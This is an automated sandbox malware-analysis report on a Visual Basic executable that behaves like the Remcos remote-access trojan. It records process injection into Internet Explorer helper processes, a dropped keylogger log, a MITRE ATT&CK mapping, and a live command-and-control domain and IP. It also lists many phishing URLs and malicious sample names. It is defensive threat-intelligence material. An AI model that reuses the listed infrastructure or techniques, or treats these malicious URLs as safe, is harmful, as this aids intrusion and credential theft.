Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe 'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'	Jump to behavior

Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Manager
Source: ielowutil.exe, 00000016.00000002.571262654.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ielowutil.exe, 00000016.00000002.571262654.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Manageranager
Source: logs.dat.22.dr	Binary or memory string: [ Program Manager ]
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Manager0\|
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Managerr\|
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: \|Program Manager
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program ManageryO
Source: ielowutil.exe, 00000016.00000002.571262654.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program ManageranagerH
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Managerr
Source: ielowutil.exe, 00000016.00000002.571662057.0000000004A80000.00000004.00000040.sdmp	Binary or memory string: \|Program Manager\|
Source: ielowutil.exe, 00000016.00000002.571697419.0000000004A87000.00000004.00000040.sdmp	Binary or memory string: Program Manager\|

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Masquerading1	OS Credential Dumping	Security Software Discovery421	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.generic.ml.exe	11%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://pki.goog/r	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/gsr2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wealthyblessed.myddns.rocks	185.157.161.61	true	true	unknown
googlehosted.l.googleusercontent.com	142.250.180.97	true	false	high
g.msn.com	unknown	unknown	false	high
doc-0c-8c-docs.googleusercontent.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pki.goog/gsr2/GTS1O1.crt0	ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/r	ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gsr202	ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	ielowutil.exe, 00000016.00000003.540935394.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gts1o1core0	ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr2	ielowutil.exe, 00000016.00000002.571131966.0000000002FAE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.157.161.61	unknown	Sweden		197595	OBE-EUROPEObenetworkEuropeSE	true
142.250.180.97	unknown	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337336
Start date:	08.01.2021
Start time:	10:51:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.generic.ml.32161 (renamed file extension from 32161 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@25/1@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.7% (good quality ratio 1.5%) Quality average: 47.6% Quality standard deviation: 19.1%
HCA Information:	Successful, ratio: 83% Number of executed functions: 126 Number of non-executed functions: 14
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 104.43.139.144, 40.88.32.150, 104.79.90.110, 40.126.1.130, 20.190.129.133, 20.190.129.24, 20.190.129.17, 40.126.1.145, 20.190.129.160, 20.190.129.19, 20.190.129.2, 51.104.139.180, 92.122.213.247, 92.122.213.194, 8.253.207.120, 8.253.204.120, 67.27.157.126, 67.26.73.254, 8.248.149.254, 142.250.180.78, 20.54.26.129, 84.53.167.113, 51.11.168.160, 52.142.114.176, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net

Simulations

Behavior and APIs

Time	Type	Description
10:53:21	API Interceptor	1065x Sleep call for process: ielowutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.157.161.61	New PO.doc	Get hash	malicious	Browse
142.250.180.97	New PO.doc	Get hash	malicious	Browse
	http://down10d.zol.com.cn/zoldownload/fangsong_GB231 2@81_432727.exe	Get hash	malicious	Browse
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse
	http://kubecloud.com	Get hash	malicious	Browse
	https://blog.dericoin.com/wp-includes/shell/ivd/office/office/voicemail/index.php	Get hash	malicious	Browse
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse
	jfuoevj.exe	Get hash	malicious	Browse
	http://subreqxserver1132.azurewebsites.net	Get hash	malicious	Browse
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse
	https://wfuwdbjwquoiynfb-dot-tundasma.el.r.appspot.com/#test@test.com	Get hash	malicious	Browse
	r0u.exe	Get hash	malicious	Browse
	r0u.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
googlehosted.l.googleusercontent.com	New PO.doc	Get hash	malicious	Browse	142.250.180.97
	http://down10d.zol.com.cn/zoldownload/fangsong_GB231 2@81_432727.exe	Get hash	malicious	Browse	142.250.180.97
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse	142.250.180.97
	http://kubecloud.com	Get hash	malicious	Browse	142.250.180.97
	https://blog.dericoin.com/wp-includes/shell/ivd/office/office/voicemail/index.php	Get hash	malicious	Browse	142.250.180.97
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	142.250.180.97
	jfuoevj.exe	Get hash	malicious	Browse	142.250.180.97
	http://subreqxserver1132.azurewebsites.net	Get hash	malicious	Browse	142.250.180.97
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	142.250.180.97
	https://wfuwdbjwquoiynfb-dot-tundasma.el.r.appspot.com/#test@test.com	Get hash	malicious	Browse	142.250.180.97
	r0u.exe	Get hash	malicious	Browse	142.250.180.97
	r0u.exe	Get hash	malicious	Browse	142.250.180.97
	http://bit.ly/3nlGvk0	Get hash	malicious	Browse	216.58.206.33
	http://fokpsrhpqilmgun.65kjh455kh566gf.camdvr.org	Get hash	malicious	Browse	216.58.206.33
	https://pdfsharedmessage.xtensio.com/7wtcdlta	Get hash	malicious	Browse	216.58.206.33
	#Ud83d#Udcde_8360.htm	Get hash	malicious	Browse	216.58.215.225
	Westernsouthernlife8PG5-YSGL2K-TVU4.htm	Get hash	malicious	Browse	216.58.215.225
	https://alijafari6.wixsite.com/owa-projection-aspx	Get hash	malicious	Browse	216.58.215.225
	zsmcirs.exe	Get hash	malicious	Browse	216.58.215.225
	https://grantsvillemd.xyz/amlsbC5tY2dydWRlckB3ZXN0ZXJuc291dGhlcm4uY29t	Get hash	malicious	Browse	216.58.215.225
wealthyblessed.myddns.rocks	New PO.doc	Get hash	malicious	Browse	185.157.161.61

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OBE-EUROPEObenetworkEuropeSE	New PO.doc	Get hash	malicious	Browse	185.157.161.61
	89GsVCJAXv.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	dpR3o92MH1.exe	Get hash	malicious	Browse	185.157.162.81
	0qNSJXB8nG.exe	Get hash	malicious	Browse	185.157.162.81
	Order_1101201918_AUTECH.exe	Get hash	malicious	Browse	185.157.161.86
	7w7LwD8bqe.exe	Get hash	malicious	Browse	185.157.162.81
	ZZB5zuv1X0.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	ptoovvKZ80.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	EnJsj6nuD4.exe	Get hash	malicious	Browse	185.157.162.81
	AdviceSlip.xls	Get hash	malicious	Browse	217.64.149.169
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	50404868-c352-422f-a608-7fd64b335eec.exe	Get hash	malicious	Browse	185.157.161.86
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
GOOGLEUS	FTH2004-005.exe	Get hash	malicious	Browse	34.102.136.180
	Curriculo Laura.xlsm	Get hash	malicious	Browse	35.241.57.45
	Confirm!!!..exe	Get hash	malicious	Browse	34.102.136.180
	S4P1JiBZIZxvtFR.exe	Get hash	malicious	Browse	34.102.136.180
	Curriculo Laura.xlsm	Get hash	malicious	Browse	35.241.57.45
	inv.exe	Get hash	malicious	Browse	34.102.136.180
	PO21010699XYJ.exe	Get hash	malicious	Browse	34.102.136.180
	PO(2021.01.08).exe	Get hash	malicious	Browse	34.102.136.180
	2143453.exe	Get hash	malicious	Browse	35.213.137.208
	order.exe	Get hash	malicious	Browse	34.102.136.180
	New PO.doc	Get hash	malicious	Browse	142.250.180.97
	http://down10d.zol.com.cn/zoldownload/fangsong_GB231 2@81_432727.exe	Get hash	malicious	Browse	142.250.180.97
	https://1drv.ms:443/o/s!BAXL7VqGJe6lg0eKk2MZcT_c29ga?e=Qdftz9F3oESsQIuV76Ppsw&at=9	Get hash	malicious	Browse	130.211.19.189
	https://new-fax-messages.mydopweb.com/	Get hash	malicious	Browse	216.58.198.1
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse	142.250.180.97
	http://kubecloud.com	Get hash	malicious	Browse	142.250.180.97
	https://blog.dericoin.com/wp-includes/shell/ivd/office/office/voicemail/index.php	Get hash	malicious	Browse	142.250.180.97
	http://message.mydopweb.com	Get hash	malicious	Browse	216.58.198.33
	2.apk	Get hash	malicious	Browse	142.250.180.74
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	142.250.180.97

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	home.css.ps1	Get hash	malicious	Browse	142.250.180.97
	Curriculo Laura.xlsm	Get hash	malicious	Browse	142.250.180.97
	36.exe	Get hash	malicious	Browse	142.250.180.97
	Buran.exe	Get hash	malicious	Browse	142.250.180.97
	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#joetorre@gmail.com	Get hash	malicious	Browse	142.250.180.97
	https://survey.alchemer.com/s3/6130663/Check-11-Payment	Get hash	malicious	Browse	142.250.180.97
	https://smlfinance.com/wp-content/uploads/2021/DHL2021/MARKET/	Get hash	malicious	Browse	142.250.180.97
	atikmdag-patcher 1.4.8.exe	Get hash	malicious	Browse	142.250.180.97
	https://atacadaodocompensado.com.br/office356.com-RD163	Get hash	malicious	Browse	142.250.180.97
	http://www.secured-mailsharepoint.online/	Get hash	malicious	Browse	142.250.180.97
	jfuoevj.exe	Get hash	malicious	Browse	142.250.180.97
	https://blog.dericoin.com/wp-includes/shell/ivd/Office/office/voicemail/index.php	Get hash	malicious	Browse	142.250.180.97
	https://wqi69130.mfs.gg/099mmYl	Get hash	malicious	Browse	142.250.180.97
	PolicyUpdate.htm	Get hash	malicious	Browse	142.250.180.97
	https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeG	Get hash	malicious	Browse	142.250.180.97
	https://webmail-4fd4rvt.web.app/?emailtoken=jmahler@vocera.com&domain=vocera.com	Get hash	malicious	Browse	142.250.180.97
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	142.250.180.97
	202101041.htm	Get hash	malicious	Browse	142.250.180.97
	https://moorparklancssch-my.sharepoint.com/:o:/g/personal/16willcocks_pupils_moorpark_mp/EpuojDvAqLNHlYVejf5zx0kBqAdkUjR2VgNWcoUhvcauDg?e=Th0p8a	Get hash	malicious	Browse	142.250.180.97
	https://bit.ly/3ba3hZS	Get hash	malicious	Browse	142.250.180.97

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.673971569609487
Encrypted:	false
SSDEEP:	3:ttU3aWfXbArA4RXMRPHv31aeo:tmlSXqdHv3IP
MD5:	6FDD9F8E355305C4B08519E72F85F3DB
SHA1:	753E7BD3D8C8752A954BCCDB47CC1A6670F64145
SHA-256:	3DD190CA2C952F72F77C584BCD302523E99ABB5990FB43285D5A6C12EF9C2159
SHA-512:	AC7BEA4611D75E5419143CA81044E3A825785D730E647563B2D131010BA3EF987396E6A0F11907201B53E1810A973F8197E58FE003069A2CB0235805F6F03E5C
Malicious:	true
Reputation:	low
Preview:	..[2021/01/08 10:53:21 Offline Keylogger Started]....[ Program Manager ]..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.76607868664825
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.generic.ml.exe
File size:	73728
MD5:	0640f43c412f8f2c3bf6e1b9139db1d0
SHA1:	f07e9e5e618b14b0dd5478cb2a26f42096a10e1d
SHA256:	1664c6a330c5b318458518ea71b2a9995a91c79281a050278c3aa2388663a986
SHA512:	753029891e9db39d072cce14dd552ef313479ea0cff2e4c3a5591bbf045174ea474e2651c8bdbed5ca30429852f4d28a5126fe99bfcaf9aa9daec30ac46f0a05
SSDEEP:	768:iy6BPW3W6LV4htQ0HOwdHegY9f8BlqvrA23WPlQbu3FEtQKqECzHiFN1gx:iLBC5Jzwd+n9f8Wj73WP7EiKqlC0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...J..G..................... ....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4012d4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x47B5AC4A [Fri Feb 15 15:14:18 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a58452980f47253c6c85d2302c371765

Entrypoint Preview

Instruction
push 004098F4h
call 00007F947CE0CDA5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
pop ebp
jne 00007F947CE0CD74h
xchg eax, ebx
sbb byte ptr [ebp+48h], cl
mov byte ptr [edx+08h], ch
inc ebx
xchg eax, ebx
mov esi, 0000FFBBh
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc ecx
add byte ptr [esi+42018250h], al
inc ecx
inc edi
inc esp
dec ecx
add byte ptr [esi+00h], ch
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
and eax, EE2DD2B6h
or dword ptr [esi+05874930h], 54h
sbb cl, byte ptr [esi]
xchg eax, edx
insb
popfd
xchg eax, ecx
jo 00007F947CE0CDE6h
out B6h, al
adc dword ptr [eax+44068A47h], eax
stosd
sub ah, bh
and al, byte ptr [ecx+3Ah]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sub al, 85h
add byte ptr [eax], al
inc edi
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 544C4100h
push edx
push ebp
add byte ptr [53000A01h], cl
je 00007F947CE0CE21h
jo 00007F947CE0CE18h
jne 00007F947CE0CE24h
bound esi, dword ptr [ebp+38h]
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf414	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x8e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xbc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe7c4	0xf000	False	0.3900390625	data	5.3469676548	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0xa0c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x8e4	0x1000	False	0.166748046875	data	1.92463381633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x117b4	0x130	data
RT_ICON	0x114cc	0x2e8	data
RT_ICON	0x113a4	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x11374	0x30	data
RT_VERSION	0x11150	0x224	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

